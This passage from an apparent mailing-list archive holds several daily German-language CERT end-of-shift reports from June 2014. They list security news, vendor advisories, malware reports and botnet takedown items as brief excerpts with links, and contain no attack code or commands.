http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** DSA-2958 apt *** --------------------------------------------- security update --------------------------------------------- http://www.debian.org/security/2014/dsa-2958 *** DSA-2957 mediawiki *** --------------------------------------------- security update --------------------------------------------- http://www.debian.org/security/2014/dsa-2957 *** VMSA-2014-0006.1 *** --------------------------------------------- VMware product updates address OpenSSL security vulnerabilities --------------------------------------------- http://www.vmware.com/security/advisories/VMSA-2014-0006.html *** Yealink VoIP Phones XSS / CRLF Injection *** --------------------------------------------- Topic: Yealink VoIP Phones XSS / CRLF Injection Risk: Low Text:I. ADVISORY CVE-2014-3427 CRLF Injection in Yealink VoIP Phones CVE-2014-3428 XSS vulnerabilities in Yealink VoIP Phones ... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014060079 *** SSA-963338 (Last Update 2014-06-13): Multiple Buffer Overflows in UPnP Interface of OZW and OZS Products *** --------------------------------------------- https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit… *** Bugtraq: AST-2014-005: Remote Crash in PJSIP Channel Drivers Publish/Subscribe Framework *** --------------------------------------------- http://www.securityfocus.com/archive/1/532414 *** Bugtraq: AST-2014-007: Exhaustion of Allowed Concurrent HTTP Connections *** --------------------------------------------- http://www.securityfocus.com/archive/1/532415 *** HPSBUX03046 SSRT101590 rev.1 - HP-UX Running OpenSSL, Remote Denial of Service (DoS), Code Execution, Security Restriction Bypass, Disclosure of Information, or Unauthorized Access *** --------------------------------------------- Potential security vulnerabilities have been identified with HP-UX running OpenSSL. These vulnerabilities could be exploited remotely to create a Denial of Service (DoS), execute code, bypass security restrictions, disclose information, or allow unauthorized access. --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…

1 0

Tageszusammenfassung - Donnerstag 12-06-2014
by Daily end-of-shift report 12 Jun '14

12 Jun '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 11-06-2014 18:00 − Donnerstag 12-06-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Weekly Metasploit Update: Meterpreter Madness *** --------------------------------------------- https://community.rapid7.com/community/metasploit/blog/2014/06/11/weekly-me… *** MSRT June 2014 - Necurs *** --------------------------------------------- This month we added Win32/Necurs to the Microsoft Malicious Software Removal Tool (MSRT). In a previous blog about Necurs I outlined the familys prevalence and the techniques it uses to execute its payload. In this blog, I will discuss the Necurs rootkit components Trojan:WinNT/Necurs.A and Trojan:Win64/Necurs.A in greater depth. These Necurs rootkit components are sophisticated drivers that try to block security products during every stage of Windows startup. It's important to note that... --------------------------------------------- http://blogs.technet.com/b/mmpc/archive/2014/06/10/msrt-june-2014-necurs.as… *** Gmail Bug Could Have Exposed Every User's Address *** --------------------------------------------- Security tester Oren Hafif says that he found and helped fix a bug in Googles Gmail service that could have been used to extract millions of Gmail addresses, if not all of them, in a matter of days or weeks. --------------------------------------------- http://feeds.wired.com/c/35185/f/661467/s/3b66e7a5/sc/4/l/0L0Swired0N0C20A1… *** Small businesses running cloud-based POS software hit with unique POSCLOUD malware *** --------------------------------------------- Researchers with IntelCrawler have identified a unique type of malware, known as POSCLOUD, which targets cloud-based point-of-sale software. --------------------------------------------- http://feedproxy.google.com/~r/SCMagazineHome/~3/PLQgnJ1-_Mc/ *** Yahoo Toolbar triggers XSS in Google, other popular services, researcher finds *** --------------------------------------------- A researcher discovered that Yahoo Toolbar triggers XSS in highly popular services, which could enable an attacker to hijack accounts. --------------------------------------------- http://feedproxy.google.com/~r/SCMagazineHome/~3/rM026xMWg8U/ *** Feedly and Evernote Hit by DDoS Attacks, Extortion Demands *** --------------------------------------------- Yesterday, the most popular RSS reader Feedly was down as a result of a large scale distributed-denial-of service (DDoS) attack carried by the cybercriminals to extort money. On Wednesday, the Feedly was temporarily unavailable for its users. Feedly posted details of the attack at 5:00 AM ET on its blog saying that they were under a Distributed Denial of Service (DDoS) attack and --------------------------------------------- http://feedproxy.google.com/~r/TheHackersNews/~3/9ZGb8CUzJwg/feedly-and-eve… *** RSS-Dienst: Feedly ist wieder erreichbar *** --------------------------------------------- Nach einem Ausfall von knapp 24 Stunden ist der RSS-Dienst Feedly wieder nutzbar. Kriminelle führten eine DDos-Attacke gegen die Feedly-Server durch und forderten eine Geldzahlung, um den Angriff zu beenden. --------------------------------------------- http://www.golem.de/news/rss-dienst-feedly-ist-wieder-erreichbar-1406-10713… *** Feedly wieder unter DDoS-Beschuss *** --------------------------------------------- Die Cyber-Erpresser, die den Newsreader-Dienst Feedly am MIttwoch lahm gelegt haben, geben offenbar nicht auf. Erneut ist der Dienst nicht erreichbar. --------------------------------------------- http://www.heise.de/security/meldung/Feedly-wieder-unter-DDoS-Beschuss-2220… *** TweetDeck mit Herzfehler *** --------------------------------------------- Durch einen Bug hat der Twitter-Client in Tweets eingebettete JavaScript-Code ausgeführt, wenn daran ein Unicode-Herz angehängt wurde. --------------------------------------------- http://www.heise.de/security/meldung/TweetDeck-mit-Herzfehler-2220478.html *** The Computer Security Threat From Ultrasonic Networks *** --------------------------------------------- KentuckyFC (1144503) writes Security researchers in Germany have demonstrated an entirely new way to attack computer networks and steal information without anybody knowing. The new medium of attack is ultrasonic sound. It relies on software that uses the built-in speakers on a laptop to broadcast at ultrasonic frequencies while nearby laptops listen out for the transmissions and pass them on, a set up known as a mesh network. The team has tested this kind of attack on a set of Lenovo T400... --------------------------------------------- http://rss.slashdot.org/~r/Slashdot/slashdot/~3/1R8EpiBl880/story01.htm *** VMware Patches ESXi Against OpenSSL Flaw, But Many Other Products Still Vulnerable *** --------------------------------------------- While the group of vulnerabilities that the OpenSSL Project patched last week hasn't grown into the kind of mess that the Heartbleed flaw did, the vulnerabilities still affect a huge range of products. Vendors are still making their way through the patching process, and VMware has released an advisory confirming that a long list of... --------------------------------------------- http://threatpost.com/vmware-patches-esxi-against-openssl-flaw-but-many-oth… *** Project Un1c0rn Wants to Be the Google for Lazy Security Flaws *** --------------------------------------------- Following broad security scares like that caused by the Heartbleed bug, it can be frustratingly difficult to find out if a site you use often still has gaping flaws. But a little known community of software developers is trying to change that, by creating a searchable, public index of websites with known security issues. --------------------------------------------- http://motherboard.vice.com/en_ca/read/is-this-website-vulnerable-to-hacker… *** Cisco IOS XR Software IPv6 Malformed Packet Denial of Service Vulnerability *** --------------------------------------------- cisco-sa-20140611-ipv6 --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** JSA10628 - 2014-06 Security Bulletin: Junos Pulse Secure Access Service (SSL VPN) and Junos Pulse Access Control Service (UAC): Weak SSL cipher allowed unexpectedly when higher level cipher group is configured (CVE-2014-3812) *** --------------------------------------------- http://kb.juniper.net/index?page=content&id=JSA10628&actp=RSS *** JSA10631 - 2014-06 Security Bulletin: NetScreen Firewall: DNS lookup issue may cause denial of service (CVE-2014-3813) *** --------------------------------------------- http://kb.juniper.net/index?page=content&id=JSA10631&actp=RSS *** JSA10632 - 2014-06 Security Bulletin: NetScreen Firewall: Malformed IPv6 packet DoS issue (CVE-2014-3814) *** --------------------------------------------- http://kb.juniper.net/index?page=content&id=JSA10632&actp=RSS *** JSA10630 - 2014-06 Security Bulletin: Junos WebApp Secure: Local user privilege escalation issue (CVE-2013-2094) *** --------------------------------------------- http://kb.juniper.net/index?page=content&id=JSA10630&actp=RSS *** SA-CONTRIB-2014-060- Petitions - Cross Site Request Forgery (CSRF) *** --------------------------------------------- Advisory ID: DRUPAL-SA-CONTRIB-2014-060Project: - Petitions - (third-party distribution)Version: 7.xDate: 2014-June-11Security risk: Less criticalExploitable from: RemoteVulnerability: Cross Site Request ForgeryDescriptionThis distribution enables you to build an application that lets users create and sign petitions.The contained wh_petitions module doesnt sufficiently verify the intent of the user when signing a petition. A malicious user could trick another user into signing a petition they... --------------------------------------------- https://drupal.org/node/2284571 *** SA-CONTRIB-2014-059 - Touch Theme - Cross Site Scripting (XSS) *** --------------------------------------------- Advisory ID: DRUPAL-SA-CONTRIB-2014-059Project: Touch (third-party module)Version: 7.xDate: 2014-June-11Security risk: Moderately criticalExploitable from: RemoteVulnerability: Cross Site ScriptingDescriptionTouch Theme is a light weight theme with modern look and feel.The theme does not sufficiently sanitize theme settings input for Twitter and Facebook username. This vulnerability is mitigated by the fact that an attacker must have a role with the permission "Administer themes".CVE... --------------------------------------------- https://drupal.org/node/2284415 *** Cisco IOS XR ASR 9000 IPv6 Processing Flaw Lets Remote Users Deny Service *** --------------------------------------------- http://www.securitytracker.com/id/1030400 *** DSA-2956 icinga *** --------------------------------------------- security update --------------------------------------------- http://www.debian.org/security/2014/dsa-2956 *** DSA-2955 iceweasel *** --------------------------------------------- security update --------------------------------------------- http://www.debian.org/security/2014/dsa-2955 *** Netscape Portable Runtime API Buffer Overflow May Let Remote Users Execute Arbitrary Code *** --------------------------------------------- http://www.securitytracker.com/id/1030404

1 0

Tageszusammenfassung - Mittwoch 11-06-2014
by Daily end-of-shift report 11 Jun '14

11 Jun '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 10-06-2014 18:00 − Mittwoch 11-06-2014 18:00 Handler: Stephan Richter Co-Handler: Robert Waldner *** Microsoft Security Bulletin Summary for June 2014 - Version: 1.0 *** --------------------------------------------- This bulletin summary lists security bulletins released for June 2014. With the release of the security bulletins for June 2014, this bulletin summary replaces the bulletin advance notification originally issued June 5, 2014. --------------------------------------------- https://technet.microsoft.com/en-us/library/security/MS14-JUN *** Assessing risk for the June 2014 security updates *** --------------------------------------------- Today we released seven security bulletins addressing 66 unique CVEs. Two bulletins have a maximum severity rating of Critical while the other five have a maximum severity rating of Important. This table is designed to help you prioritize the deployment of updates appropriately for your environment. Bulletin Most likely attack vector Max Bulletin Severity Max XI Likely first 30 days impact Platform mitigations and key notes MS14-035(Internet Explorer) Victim browses to a malicious --------------------------------------------- http://blogs.technet.com/b/srd/archive/2014/06/10/assessing-risk-for-the-ju… *** Android no longer reveals app permission changes in automatic updates *** --------------------------------------------- Change could heighten security risks for users. --------------------------------------------- http://feeds.arstechnica.com/~r/arstechnica/security/~3/KCMtV-_xnqA/ *** May 2014 Cyber Attack Statistics *** --------------------------------------------- As I noticed previously in these pages, looks like attackers are just waiting for the Summer, since the number of events in May has experienced a sensible decreease. The Daily Trend Of Attacks chart shows quite a linear trend with two small peaks around the 15 and 30 May. Overall the activity appears quite limited. --------------------------------------------- http://hackmageddon.com/2014/06/11/may-2014-cyber-attack-statistics/

1 0

Tageszusammenfassung - Dienstag 10-06-2014
by Daily end-of-shift report 10 Jun '14

10 Jun '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 06-06-2014 18:00 − Dienstag 10-06-2014 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** Microsoft preps seven fixes, two critical, for Patch Tuesday release *** --------------------------------------------- The critical patches will remediate remote code execute (RCE) bugs in Windows, IE, Office and Microsoft Lync. --------------------------------------------- http://www.scmagazine.com/microsoft-preps-seven-fixes-two-critical-for-patc… *** Microsoft will Uralt-Lücke bei Internet Explorer ausmerzen *** --------------------------------------------- Sieben Update-Pakete für kommenden Patchday angekündigt - Support für XP fraglich --------------------------------------------- http://derstandard.at/2000001862657 *** Security updates available for Adobe Flash Player (APSB14-16) *** --------------------------------------------- Adobe has released security updates for Adobe Flash Player 13.0.0.214 and earlier versions for Windows and Macintosh and Adobe Flash Player 11.2.202.359 and earlier versions for Linux. These updates address vulnerabilities that could potentially allow an attacker to take control of the affected system. Adobe recommends users update their product installations to the latest versions:... --------------------------------------------- https://helpx.adobe.com/security/products/flash-player/apsb14-16.html *** Microsoft Fixing Windows 8 Flaws, But Leaving Them In Windows 7 *** --------------------------------------------- mask.of.sanity sends this news from El Reg: "Microsoft has left Windows 7 exposed by only applying security upgrades to its newest operating systems. Researchers found the gaps after they scanned 900 Windows libraries using a custom diffing tool and uncovered a variety of security functions that were updated in Windows 8 but not in 7. They said the shortcoming could lead to the discovery of zero day vulnerabilities. The missing safe functions were part of Microsofts dedicated libraries... --------------------------------------------- http://rss.slashdot.org/~r/Slashdot/slashdot/~3/Rz2E0q7KOps/story01.htm *** Coordinated malware eradication nears launch *** --------------------------------------------- Good news: the coordinated malware eradication preparations are almost done. We have held several roundtable meetings at industry events around the world, and the last two are scheduled for June and July. We had insightful conversations with a diverse group of experts from across the antimalware industry. The ideas have converged into a shared vision of how we'll work together to put pressure on the malware ecosystem. I am excited for the first coordinated eradication campaigns to... --------------------------------------------- http://blogs.technet.com/b/mmpc/archive/2014/06/04/coordinated-malware-erad… *** Routersicherheit: Fritzbox sucht automatisch nach Firmware-Updates *** --------------------------------------------- AVM hat eine Konsequenz aus der schweren Sicherheitslücke seiner Router gezogen. Eine Laborversion ermöglicht nun ein automatisches Update der Firmware. --------------------------------------------- http://www.golem.de/news/routersicherheit-fritzbox-sucht-automatisch-nach-f… *** Backstage with the Gameover Botnet Hijackers *** --------------------------------------------- When youre planning to rob the Russian cyber mob, youd better be sure that you have the element of surprise, that you can make a clean getaway, and that you understand how your target is going to respond. Todays column features an interview with two security experts who helped plan and execute this weeks global, collaborative effort to hijack the Gameover Zeus botnet, an extremely resilient and sophisticated crime machine that helped an elite group of thieves steal more than $100 million from --------------------------------------------- http://feedproxy.google.com/~r/KrebsOnSecurity/~3/QUb7mFxjXlc/ *** Extracting the payload from a CVE-2014-1761 RTF document *** --------------------------------------------- Background In March Microsoft published security advisory 2953095, detailing a remote code execution vulnerability in multiple versions of Microsoft Office (CVE-2014-1761). A Technet blog was released at the same time which contained excellent information on how a typical malicious document would be constructed. NCC Group's Cyber Defence Operations team used the information in the Technet blog to identify a malicious document within our malware zoo that exploited this vulnerability which... --------------------------------------------- https://www.nccgroup.com/en/blog/2014/06/extracting-the-payload-from-a-cve-… *** Weve Set Up a One-Click Test For GameOver ZeuS *** --------------------------------------------- Today weve published a new, quick way to check if your computer is infected by GameOver ZeuS (GOZ). Last week the GOZ botnet was disrupted by international law enforcement together with industry partners, including ourselves.It is of critical importance to realize GOZ was disrupted - not dismantled. Its not technically impossible for the botnet administrators to reclaim control in the near future. More than one million computers are infected by GOZ, time is of the essence.To assist with... --------------------------------------------- http://www.f-secure.com/weblog/archives/00002712.html *** Cyber-Kriminalität kostet laut Studie weltweit über 400 Mrd. Dollar *** --------------------------------------------- In Österreich beträgt der Schaden 0,41 Prozent des Bruttoinlandsproduktes --------------------------------------------- http://derstandard.at/2000001878950 *** "Red Button" Attack Could Compromise Some Smart TVs *** --------------------------------------------- A vulnerability in an emerging interactive television standard could open up number of smart TVs to untraceable drive-by attacks. --------------------------------------------- http://threatpost.com/red-button-attack-could-compromise-some-smart-tvs/106… *** Chrome OS leaks data to Google before switching on a VPN, says GCHQ *** --------------------------------------------- UK spy-base wing in new advice for BlackBerry, and Google OSes The sexy-named Communications Electronics Security Group (CESG) - the bit of GCHQ that helps Brits protect secrets from foreign spies (never mind GCHQ) - has issued new advice for securing BlackBerry OS 10, Android and Chrome OS 32. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/06/10/security_gu… *** Zeus Alternative "Pandemiya" Emerges in Cybercrime Underground *** --------------------------------------------- Pandemiya has all the capabilities that are typical among banking Trojans, such as injecting fake elements into websites, capturing screenshots of the users computer screen, and encrypting its communications with the control panel. What sets Pandemiya apart from all other banking Trojans is the fact that it has been written from scratch without sharing any source code with Zeus, Fleyder said. --------------------------------------------- https://www.securityweek.com/zeus-alternative-pandemiya-emerges-cybercrime-… *** iOS Malware Does Exist *** --------------------------------------------- Before somebody asks me (again) whether there are any iOS malware or not, I decided to consolidate the information for you. --------------------------------------------- https://blog.fortinet.com/iOS-malware-do-exist/ *** Cisco Wireless LAN Controller Cisco Discovery Protocol Denial of Service Vulnerability *** --------------------------------------------- CVE-2014-3291 --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Citrix Security Advisory for OpenSSL Vulnerabilities (June 2014) *** --------------------------------------------- Severity: High Overview The OpenSSL security advisory released on the 5 th of June 2014 disclosed six security vulnerabilities in this open source component; these are described below: --------------------------------------------- http://support.citrix.com/article/CTX140876 *** SAP Hard-Coded Credentials *** --------------------------------------------- Topic: SAP Hard-Coded Credentials Risk: Medium Text: Onapsis Security Advisories:Multiple Hard-coded Usernames (CWE-798) have been found and patched in a variety of SAP componen... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014060046 *** MediaWiki Input Validation Flaw in Special:PasswordReset Permits Cross-Site Scripting Attacks *** --------------------------------------------- http://www.securitytracker.com/id/1030364 *** VU#758382: Unauthorized modification of UEFI variables in UEFI systems *** --------------------------------------------- Vulnerability Note VU#758382 Unauthorized modification of UEFI variables in UEFI systems Original Release date: 09 Jun 2014 | Last revised: 09 Jun 2014 Overview Certain firmware implementations may not correctly protect and validate information contained in certain UEFI variables. Exploitation of such vulnerabilities could potentially lead to bypass of security features and/or denial of service for the platform. Description According to Corey Kallenberg, Xeno Kovah, John Butterworth, and Sam... --------------------------------------------- http://www.kb.cert.org/vuls/id/758382 *** Cisco Unified Communications Manager Java Interface SQL Injection Vulnerability *** --------------------------------------------- CVE-2014-3287 --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** WebEx Meeting Server Sensitive Information Disclosure Vulnerability *** --------------------------------------------- CVE-2014-3294 --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Vuln: Cisco Wireless LAN Controller CVE-2014-3291 Denial of Service Vulnerability *** --------------------------------------------- Cisco Wireless LAN Controller CVE-2014-3291 Denial of Service Vulnerability --------------------------------------------- http://www.securityfocus.com/bid/67926 *** IBM Security Bulletin: Denial of Service attack possible on Cúram instances using Apache Commons FileUpload (CVE-2014-0050) *** --------------------------------------------- A version of Apache Commons FileUpload shipped with Cúram is vulnerable to a denial of service attack. CVE(s): CVE-2014-0050 Affected product(s) and affected version(s): Cúram Social Program Management All products are affected when running code releases 4.5 SP10, 5.0, 5.2, 5.2 SP1, 5.2 SP4, 5.2 SP4 DE, 5.2 SP5, 5.2 SP6, 6.0 SP2, 6.0.3.0, 6.0.4.0, 6.0.4.3, 6.0.4.4, 6.0.4.5, 6.0.5.2, 6.0.5.3, 6.0.5.4. Refer to the following reference URLs for remediation and additional... --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… *** WebTitan: Multiple critical vulnerabilities *** --------------------------------------------- product: WebTitan vulnerable version: 4.01 (Build 68) fixed version: 4.04 impact: critical ... 1) SQL Injection 2) Remote command execution 3) Path traversal 4) Unprotected Access --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…

1 0

Tageszusammenfassung - Freitag 6-06-2014
by Daily end-of-shift report 06 Jun '14

06 Jun '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 05-06-2014 18:00 − Freitag 06-06-2014 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Hunderttausende Server über Fernwartungsprotokolle angreifbar *** --------------------------------------------- Das Fernwartungsprotokoll IPMI, mit dem Server über die Firmware des Motherboards gewartet werden können, hat gravierende Sicherheitslücken. Forscher haben bei einem Scan des Internets haufenweise Server gefunden, die angreifbar sind. --------------------------------------------- http://www.heise.de/security/meldung/Hunderttausende-Server-ueber-Fernwartu… *** Microsoft Security Bulletin Advance Notification for June 2014 - Version: 1.0 *** --------------------------------------------- https://technet.microsoft.com/en-us/library/security/MS14-JUN *** Microsoft to Patch Critical Internet Explorer Zero-Day Vulnerability Next Tuesday *** --------------------------------------------- Today Microsoft has released its Advance Notification for the month of June 2014 Patch Tuesday releasing seven security Bulletins, which will address several vulnerabilities in its products, out of which two are marked critical and rest are important in severity. This Tuesday, Microsoft will issue Security Updates to .. --------------------------------------------- http://thehackernews.com/2014/06/microsoft-to-patch-critical-internet.html *** Linux Kernel futex privilege escalation *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/93593 *** Linux: Kernel-Bug erlaubt Sandbox-Ausbrüche *** --------------------------------------------- Ein Fehler im Futex-Code von Linux erlaubt Nutzern vollen Zugriff auf den Kernel. Damit liesse sich etwa aus der Chrome-Sandbox ausbrechen. Patches sind bereits verfügbar. --------------------------------------------- http://www.golem.de/news/linux-kernel-bug-erlaubt-sandbox-ausbrueche-1406-1… *** Bugtraq: ESA-2014-046: EMC Documentum Content Server Multiple Vulnerabilities *** --------------------------------------------- http://www.securityfocus.com/archive/1/532311 *** Hacking Apple ID? *** --------------------------------------------- The many announcements at Apple's 2014 Worldwide Developers Conference (WWDC) this week was welcome news to the throngs of Apple developers and enthusiasts. It was also welcome news for another group of people with less than clean motives: cybercriminals. Last week we got a concrete example of how some .. --------------------------------------------- blog.trendmicro.com/trendlabs-security-intelligence/hacking-apple-id/ *** Daktronics Vanguard Hardcoded Credentials (Update A) *** --------------------------------------------- http://ics-cert.us-cert.gov//alerts/ICS-ALERT-14-155-01A *** Noch mehr Herzbluten bei OpenSSL *** --------------------------------------------- Der Verursacher der Heartbleed-Lücke hat weiteren Code zum Open-Source-Projekt beigetragen. Und auch der hat offensichtliche Sicherheitslücken. --------------------------------------------- http://www.heise.de/security/meldung/Noch-mehr-Herzbluten-bei-OpenSSL-22172… *** Phish or legit - Can you tell the difference? *** --------------------------------------------- I recently received two emails, sent to two different addresses and both from different senders. The first email was allegedly from Apple and was sent to my work account. The second email was allegedly from the Bank of Montreal (BMO) and was sent to my personal account. Both were unsolicited and were asking me to click on links contained in the body of the email. --------------------------------------------- http://nakedsecurity.sophos.com/2014/06/06/phish-or-legit-can-you-tell-the-… *** Web-Browser: Neues History-Leck schwer zu stopfen *** --------------------------------------------- Eine Javascript-Funktion erlaubt es indirekt, die Ladezeiten einer Webseite zu messen. Damit lässt sich herausfinden, ob ein Besucher bestimmte Links schon einmal aufgerufen hat. --------------------------------------------- http://www.heise.de/security/meldung/Web-Browser-Neues-History-Leck-schwer-… *** [2014-06-06] Multiple critical vulnerabilities in WebTitan *** --------------------------------------------- Multiple critical security vulnerabilities have been identified in the WebTitan web filtering solution. Exploiting these vulnerabilities potential attackers could take control over the entire appliance. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…

1 0

Tageszusammenfassung - Donnerstag 5-06-2014
by Daily end-of-shift report 05 Jun '14

05 Jun '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 04-06-2014 18:00 − Donnerstag 05-06-2014 18:00 Handler: Alexander Riepl Co-Handler: Robert Waldner *** Peek Inside a Professional Carding Shop *** --------------------------------------------- Over the past year, Ive spent a great deal of time trolling a variety of underground stores that sell "dumps" -- street slang for stolen credit card data that buyers can use to counterfeit new cards and go shopping in big-box stores for high-dollar merchandise that can be resold quickly for cash. --------------------------------------------- http://krebsonsecurity.com/2014/06/peek-inside-a-professional-carding-shop/ *** Daktronics Vanguard Hardcoded Credentials *** --------------------------------------------- NCCIC/ICS-CERT is aware of a public report of a hardcoded password vulnerability affecting Daktronics Vanguard highway notification sign configuration software. According to this report, the vulnerability is a hardcoded password that could allow unauthorized access to the highway sign. --------------------------------------------- http://ics-cert.us-cert.gov//alerts/ICS-ALERT-14-155-01 *** New Apple operating systems bring security mysteries *** --------------------------------------------- Apples march toward seamless integration between the Mac, iPhone and iPad worries some security experts who say companies may find it more difficult to prevent data leakage on the devices.On Monday, Apple introduced Handoff, a feature in upcoming iOS 8 and Mac OS X Yosemite that would let a person start a task on one device and complete it on another. For example, an email started on the Mac could be completed later on the iPad. --------------------------------------------- http://www.csoonline.com/article/2360161/data-protection/new-apple-operatin… *** Android-Trojaner verschlüsselt Speicherkarte *** --------------------------------------------- Ein weiter Malware-Trend erreicht Android: Nach den Erpressungstrojanern, die das Gerät sperren, gibt es nun auch einen Schädling, der das digitale Hab und Gut seines Opfers verschlüsselt. Für die Entschlüsselung der Daten verlangen die Ganoven Geld. --------------------------------------------- http://www.heise.de/security/meldung/Android-Trojaner-verschluesselt-Speich… *** Sicherheitsprobleme mit OpenSSL *** --------------------------------------------- Das OpenSSL-Projekt hat eine Warnung bezüglich mehrerer sicherheitsrelevanter Schwachstellen veröffentlicht. Es besteht die Möglichkeit von Remote Code Execution, Denial Of Service und Man-in-the-middle Attacken. Diese können sowohl OpenSSL Clients als auch Server betreffen. --------------------------------------------- http://cert.at/warnings/all/20140605.html *** IBM Security Bulletin: Vulnerability which could allow for unauthorized access to an IBM API Management topology *** --------------------------------------------- There is a vulnerability which could allow for unauthorized access to an IBM API Management topology, when a user secures APIs with basic authentication CVE(s): CVE-2014-3036 Affected product(s) and affected version(s): IBM API Management V3.0.0.0 --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… *** They're ba-ack: Browser-sniffing ghosts return to haunt Chrome, IE, Firefox *** --------------------------------------------- Privacy threat that allows websites to know what sites youve viewed is revived. --------------------------------------------- http://feeds.arstechnica.com/~r/arstechnica/security/~3/mZ97m15Wo_M/ *** Security-Experten isolierten über 2 Millionen Gameover-Bots *** --------------------------------------------- Im Rahmen der Aktionen gegen das Botnetz Gameover Zeus musste ein riesige Peer-to-Peer-Netz ausgeschaltet werden. Über zwei Millionen infizierte Rechner mussten dazu manipuliert werden. --------------------------------------------- http://www.heise.de/security/meldung/Security-Experten-isolierten-ueber-2-M… *** Security Notice-Statement About the CSRF Vulnerability on Multiple Huawei 3G Wi-Fi Devices *** --------------------------------------------- Huawei has noticed that several websites reported the CSRF vulnerability on Huawei E355, E5331, E303, B593 3G Mobile Wi-Fi Devices. --------------------------------------------- http://www.huawei.com/en/security/psirt/security-bulletins/security-notices… *** Webfwlog - Firewall Log Analyzer *** --------------------------------------------- Webfwlog is a flexible web-based firewall log analyzer and reporting tool. It supports standard system logs for linux, FreeBSD, OpenBSD, NetBSD, Solaris, Irix, OS X, etc. as well as Windows XP. Supported log file formats are netfilter, ipfilter, ipfw, ipchains and Windows XP. ... You can sort a report with a single click, 'drill-down' on the reports all the way to the packet level, and save your reports for later use. --------------------------------------------- http://hack-tools.blackploit.com/2014/06/webfwlog-firewall-log-analyzer.html

1 0

Tageszusammenfassung - Mittwoch 4-06-2014
by Daily end-of-shift report 04 Jun '14

04 Jun '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 03-06-2014 18:00 − Mittwoch 04-06-2014 18:00 Handler: Alexander Riepl Co-Handler: n/a *** GameOver Zeus Takedown Shows Good Early Returns *** --------------------------------------------- The effect of the takedown of the GameOver Zeus botnet this week has been immediate and significant. Researchers who track the activity of the peer-to-peer botnet's activity say that the volume of packets being sent out by infected machines has dropped to almost zero. On Friday, the FBI and Europol, .. --------------------------------------------- http://threatpost.com/gameover-zeus-takedown-shows-good-early-returns/106429 *** Phishing Tale: An Analysis of an Email Phishing Scam *** --------------------------------------------- Phishing scams are always bad news, and in light of the Google Drive scam that made the rounds again last week, we thought we'd tell the story of some spam that was delivered into my own inbox because even security researchers, .. --------------------------------------------- http://blog.sucuri.net/2014/06/phishing-tale-an-analysis-of-an-email-phishi… *** Making end-to-end encryption easier to use *** --------------------------------------------- While end-to-end encryption tools like PGP and GnuPG have been around for a long time, they require a great deal of technical know-how and manual effort to use. To help make this kind of encryption a bit easier, we're releasing code for a new Chrome extension that uses OpenPGP, an open standard supported by many existing encryption tools. However, .. --------------------------------------------- http://googleonlinesecurity.blogspot.co.at/2014/06/making-end-to-end-encryp… *** The Best Of Both Worlds - Soraya *** --------------------------------------------- Arbor Networks' ASERT has recently discovered a new malware family that combines several techniques to steal payment card information. Dubbed Soraya, meaning 'rich', this malware uses memory scraping techniques similar to those found in Dexter to target point-of-sale terminals. Soraya also intercepts form data sent from web browsers, similar to the Zeus family of malware. Neither of these two techniques are new, but we have not seen them used together in the same piece of malware. --------------------------------------------- http://www.arbornetworks.com/asert/2014/06/the-best-of-both-worlds-soraya/ *** COPA-DATA Improper Input Validation *** --------------------------------------------- http://ics-cert.us-cert.gov//advisories/ICSA-14-154-01 *** DSA-2945 chkrootkit *** --------------------------------------------- http://www.debian.org/security/2014/dsa-2945 *** Adobe Acrobat / Reader XI-X AcroBroker Sandbox Bypass *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2014060030 *** FreeBSD PAM Policy Parser Remote Authentication Bypass *** --------------------------------------------- http://www.securitytracker.com/id/1030330

1 0

Tageszusammenfassung - Dienstag 3-06-2014
by Daily end-of-shift report 03 Jun '14

03 Jun '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 02-06-2014 18:00 − Dienstag 03-06-2014 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Energy Bill Spam Campaign Serves Up New Crypto Malware *** --------------------------------------------- Everyone hates getting bills, and with each new one it seems like the amount due just keeps getting higher and higher. However, Symantec recently discovered an energy bill currently being .. --------------------------------------------- http://www.symantec.com/connect/blogs/energy-bill-spam-campaign-serves-new-… *** Writing robust Yara detection rules for Heartbleed *** --------------------------------------------- This blog walks through the methodology and process of writing robust Yara rules to detect either Heartbleed vulnerable OpenSSL statically linked or shared libraries which omit version information. Although Yara is designed for pattern matching and typically used by malware researchers we'll show how we can also use it to detect vulnerable binaries. --------------------------------------------- https://www.nccgroup.com/en/blog/2014/06/writing-robust-yara-detection-rule… *** Huawei-Router lassen sich aus dem Internet kapern *** --------------------------------------------- Eine Reihe von Schwachstellen in zwei Mobilnetz-Routern von Huawei ermglichen es, die Geräte aus dem Internet zu kapern. Eine der Schwachstellen hatte Huawei schon einmal geschlossen - offensichtlich nicht gründlich genug. --------------------------------------------- http://www.heise.de/security/meldung/Huawei-Router-lassen-sich-aus-dem-Inte… *** TYPO3-EXT-SA-2014-009: Cross-Site Scripting in news *** --------------------------------------------- It has been discovered that the extension "News system" (news) is susceptible to Cross-Site Scripting --------------------------------------------- 